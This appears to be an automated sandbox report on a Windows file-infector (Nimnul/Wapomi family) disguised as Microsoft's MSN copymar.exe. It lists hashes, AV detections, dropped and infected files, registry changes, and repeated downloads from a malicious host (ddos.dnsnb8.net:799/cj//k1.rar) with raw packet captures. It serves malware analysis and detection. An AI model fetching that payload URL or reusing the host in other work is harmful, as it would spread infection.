Analysis Date2016-01-07 01:52:05
MD5b79363a8c8c29b3826bb8fd557bb74cb
SHA182cff3f73b8fa1563b836f2a86cb8a8802466c87

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section.data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section.rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
SectionX?5u{ md5: d1548cc9e1660d34f63b32ac1011f5cf sha1: ec42a80520b78d83e7c26e1dd72afb7f363c1ccc size: 20480
Timestamp2001-07-19 19:30:07
Pdb pathpdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhashbdcf3af793fc6cefedb0fa9ef526d3dea0b02aae
IMPhash6df6e99bae10817058127898c796b82d
AVCA (E-Trust Ino)Win32/Nimnul.A
AVRisingWin32.Roue.a
AVMcafeeW32/Kudj
AVAvira (antivir)W32/Jadtre.B
AVTwisterVirus.558BEC81EC@120000#.mg
AVAd-AwareWin32.VJadtre.3
AVAlwil (avast)Malware-gen:Evo-gen [Susp]:Win32:Malware-gen
AVEset (nod32)Win32/Wapomi.BA virus
AVGrisoft (avg)Win32/Wapomi.I
AVSymantecW32.Wapomi.C!inf
AVFortinetW32/Nimnul.F
AVBitDefenderWin32.VJadtre.3
AVK7Virus ( 0040f7441 )
AVMicrosoft Security EssentialsVirus:Win32/Mikcer.B
AVMicroWorld (escan)Win32.VJadtre.3
AVMalwareBytesTrojan.FakeMS.ED
AVAuthentiumW32/PatchLoad.E
AVFrisk (f-prot)W32/PatchLoad.E
AVIkarusTrojan-Downloader.Win32.Small
AVEmsisoftWin32.VJadtre.3
AVZillya!Virus.Nimnul.Win32.5
AVKasperskyVirus.Win32.Nimnul.f
AVTrend MicroPE_WAPOMI.BM
AVCAT (quickheal)W32.Nimnul.F1
AVVirusBlokAda (vba32)Virus.Nimnul.19209
AVBullGuardWin32.VJadtre.3
AVArcabit (arcavir)Win32.VJadtre.3
AVClamAVWin.Trojan.Downloader-64296
AVDr. WebBackDoor.Darkshell.246
AVF-SecureWin32.VJadtre.3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\GCI.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\GTplus\Time ➝
NULL
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\10ff3eb0.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\temp\files\malware.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\temp\files\GCI.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Network Details:

DNSddos.dnsnb8.net
Type: A
23.253.76.160
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ddos.dnsnb8.net:799/cj//k1.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1033 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1034 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1035 ➝ 23.253.76.160:799
Flows TCP192.168.1.1:1036 ➝ 23.253.76.160:799

Raw Pcap
0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f636a2f 2f6b312e 72617220   GET /cj//k1.rar 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a206464 6f732e64 6e736e62   Host: ddos.dnsnb
0x000000b0 (00176)   382e6e65 743a3739 390d0a43 6f6e6e65   8.net:799..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....


Strings
f

000004E4
040904B0
%1 is an unimplemented method
6.10.0016.1624
about
accessimage
activeborder
activecaption
Adc#
ANSI(00)
application/x-javascript
application/x-shockwave-flash
application/x-unknown
application/x-vbscript
appworkspace
.asa
.asp
audio/wav
autoupdate
background
.BAK.{FEC69D39-ADBA-4928-98F0-3571AA97ABDF}
{BB7E11D6-5E67-4005-A530-ED1831D6A427}
.bmp
bold
bolder
border
bottom
Built by
buttonface
buttonhighlight
buttonshadow
buttontext
ByteCount
captiontext
@CBitmapSurface::EnableDefaultMappings
CBitmapSurface::SetMapping
CMarsProtStreamWrapper::Clone
CMarsProtStreamWrapper::Commit
CMarsProtStreamWrapper::CopyTo
CMarsProtStreamWrapper::LockRegion
CMarsProtStreamWrapper::Revert
@CMarsProtStreamWrapper::SetSize
CMarsProtStreamWrapper::UnlockRegion
CompanyName
content
Control Panel\Appearance
copymar
COPYMAR
copymar.exe
Copyright (C) Microsoft Corp. 1981-2000
.css
Current
Daily
.dat
default
desc
disabled
dkshadow
@donotdither
{E8055863-4956-4cbf-9CA5-46FF053A904C}
emars.ini
exceeded maximum command-line args %d
face
facetext
file
FileDescription
FileVersion
ForceReadOnlyMarchive
foreground
generaldialogs
.gif
gopher
graytext
Hardware\Description\System\CentralProcessor\0
hasfocus
High Contrast
highlight
highlighttext
hilight
hovered
hoverpressed
.htc
.htm
http
http://207.46.176.247/guidgen/guidgen.dll
@http://207.46.176.247/msndata-bvt/mdserver.dll
http://207.46.176.247/msndata/mdserver.dll
https
http://sqm.msn.com/guidgen/guidgen.dll
http://sqm.msn.com/msndata/mdserver.dll
image
image/bmp
image/gif
imageinfo.mii
@imageinfo.xml
image/jpeg
imagelist
image/pjpeg
image/png
image/x-png
inactiveborder
inactivecaption
inactivecaptiontext
infobackground
infotext
instantmsgr
instantmsgr_tabs
InternalName
italic
javascript
.jpg
left
LegalCopyright
light
lighter
local
logon
MachineInstID
mailto
manifest.xml
.MAR
MarsDataTest
marslib module %s started
MARS_ONLOAD
marsperf.log
MarsPerf shutdown
measure
mediaplayer
menu
menu_background
menubold
menutext
menu_text
~MHz
Microsoft Corporation
Microsoft(R) MSN (R) Communications System
.mii
Mode
#MSHTML#PERF#
msn://
MSN6
MSN6\
MSN6.INI
MSN Archive: Checksum Mismatch in file %s: %s
@MSN Archive Stability
msnbld
msndata
MSN is uploading non-personal data to improve our quality of service.  To disable this monitoring, go to My Settings.
msn://@ui.mar@/chanbar.htm
msnupdate!@#@.exe
.mti
name
 NavigateURL Complete
nccaption
ncmenu
ncsmcaption
ncstatus
.NEW.{9D6EAA4F-27B2-4407-AC72-4BBD2FCB6ED1}
news
nntp
normal
numimages
@OLPerf.dat
OriginalFilename
other
places
.png
popup
pressed
ProductName
ProductVersion
progress
rect
res://
right
RunCount
%s%08lX
scrollbar
searchbar
SelfHost
semibold
%s : fatal error -: 
shadow
shell
ShipFlags
sidebar
.skn
snews
Software\Microsoft\Mars\Performance
%s: %s
statusbar
StreamHandle
StreamName
strikeout
StringFileInfo
.swf
 %s%x
system
System\CurrentControlSet\Control\FontAssoc\Associated Charset
System\CurrentControlSet\Control\Terminal Server
telnet
text
text/css
text/html
text/plain
text/x-component
text/xml
threeddarkshadow
threedface
threedhighlight
threedshadow
tinycrt
titlebar
titlebar_text
toolbar
Translation
TSAppCompat
.txt
underline
update.exe
UseSysColors
ValidateMarchiveChecksums
VarFileInfo
.vbs
vbscript
VS_VERSION_INFO
wais
.wav
window
windowframe
windowtext
X-Description
.xml
@.xsl
                                                           
                                                                                 
  ---------      -------      ---------   ----------
------    ---------    --------      -------      -------
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
"#$%&'(
)*+,-.
#&'(+./
						
							
								
									
    !!!!""""####$$$$%%%%&&&&''''(((())))*****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<<====>>>>?
    !!!!""""####$$$$%%%%&&&&''''(((())))****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<<==>>???
    !!!!""""####$$$$%%%%&&&&''''(((())))****++++,,,,----....////0000111122223333444455556666777788889999::::;;;;<<<=
012345678
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 (08@P`p
0d1112131415161718191:1;1<1=1>1?1@1A1B1C1D1E1F1G1H1I1J1K1L1M1N1
0xIJD/
1000 us == 1ms == 0.001 s == 3.17e-11 years
[1\1]1^1_1`1
%11s   %11s   %11s   %s
!%)-16:>BFJNRVZ^cgkosw{
!)1:BJRZcks{
)1$N*)Q&`[U
2M+-'3
??2@YAPAXI@Z
%3d.%03d s
6.10.0016.1624
%6d  %11s   %11s   %11s   %s
%6d us
	8 [[@
88888888888888888888888888888888888888888888
9.t,W3
9.t+W3
a1b1c1
.adata
advapi32.dll
ADVAPI32.dll
.aspack
BefJ<Z0
[!Calculated durations follow:]
#Calls    TotalTime    AvgTime*      MaxTime      EvtName
CCDCEF
CloseHandle
CoCreateInstance
CoInitialize
COMCTL32.dll
ConvertINetMultiByteToUnicode
ConvertINetUnicodeToMultiByte
copymar.pdb
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateEventA
CreateEventW
CreateFileA
CreateFileMappingA
CreateFileMappingW
CreateFileW
CreateStreamOnHGlobal
CryptReleaseContext
<<<<<<<<<<<<<<<<<<<<<<<<<==>??@D.
`.data
DecodeImage
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
dleAu7
E2<2wz
eEf=ghfijklimnf=o
eHanu@
[!End Mars perf]
[End Mars Perf Statistics]
EnterCriticalSection
!Error! Fatal error encountered. Results may be inaccurate.
;E sYSV
ExitProcess
~f	2bY
^f9r$u.f
F	B^^Vd
FlushFileBuffers
f=pqrst
GDI32.dll
GetACP
GetAtomNameA
GetCommandLineA
GetCurrentDirectoryA
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetFileSize
GetImageInfo
GetLastError
GetLocalTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMuR
GetObjectA
GetObjectW
GetPaletteEntries
GetPrivateProfileIntA
GetPrivateProfileIntW
GetPrivateProfileStringA
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessTimes
GetStdHandle
GetSysColor
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempFileNameA
GetTickCount
GetVersionExA
GetVersionExW
GlobalAddAtomA
GlobalDeleteAtom
GlobalMemoryStatus
HeapAlloc
hlBT7!2
IMGUTIL.DLL
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IntersectRect
Invalid Atom
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
j0h0%@
kernel32.dll
KERNEL32.dll
K,j(QV
KLMNOP
LeaveCriticalSection
LOADER ERROR
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
lstrcmpA
lstrcpynA
lstrlenA
lstrlenW
MapViewOfFile
MARCV9
[Mars Perf Statistics  %d total  %d:%02d:%02d   %d/%d/%02d]
MessageBoxA
MessageBoxW
MLANG.DLL
{mo?F&
MoveFileA
;M s\SW
msvcrt.dll
MultiByteToWideChar
*note: average time doesn't include the MaxTime entry
O1P1Q1R1S1T1
oduluI
OffsetRect
ole32.dll
OLEAUT32.dll
OpenProcessToken
PathAppendW
PathCombineW
PathFileExistsA
PathFindFileNameW
PathIsRelativeW
PathRemoveFileSpecA
PathRemoveFileSpecW
[PerfFreq=%7d/s  *-since start :-duration %2d%% buffer used]
PVVh@,@
#]Q)/=J
QQSVW3
QueryPerformanceCounter
QueryPerformanceFrequency
QWn,n#
RaiseException
.rdata
RealizePalette
RegCloseKey
RegisterWindowMessageA
RegisterWindowMessageW
RegOpenKeyExA
RegOpenKeyExW
RegQueryValueExA
RegQueryValueExW
ReleaseDC
.reloc
RtlUnwind
SelectObject
SelectPalette
SetBkMode
SetDIBColorTable
SetEvent
SetFilePointer
SetStretchBltMode
SetTextColor
SHCreateShellPalette
SHCreateStreamOnFileW
shell32.dll
SHELL32.dll
SHFOLDER.dll
SHGetInverseCMAP
SHGetSpecialFolderPathA
SHGetValueW
shlwapi.dll
SHLWAPI.dll
SHStrDupW
s\mars\setup\copymar\obj\i386\copymar.pdb
: %s - %S
* %s - %S
[!Start Mars perf   Ver(%s)   %d:%02d:%02d   %d/%d/%02d ]
  StartTime      EndTime      TotalTime   Event Name
StrCatBuffA
StrCatBuffW
StrCmpIW
StrCmpNW
StrCpyNW
StrStrIW
StrToIntW
SVWjF3
SystemParametersInfoA
SystemParametersInfoW
TerminateProcess
The ordinal %u could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
!This program cannot be run in DOS mode.
tKh\#@
tQVVVj
t.;t$$t(
TUUUUU+
t?VVVj
tWh4V@
U1V1W1X1Y1Z1
u6AQVj
UnmapViewOfFile
URLDownloadToFileA
urlmon.dll
user32.dll
USER32.dll
UUUUUUU
UVWXYZ[
v5SUW3
VC20XC00U
 ;/VDA
VERSION.dll
VirtualAlloc
VirtualFree
VirtualProtect
?w"^D{
WideCharToMultiByte
wnsprintfA
wnsprintfW
Wqct q!
WriteFile
wsprintfA
wvnsprintfA
wvnsprintfW
XVQPjB
Zh&wP}M
zudWWWW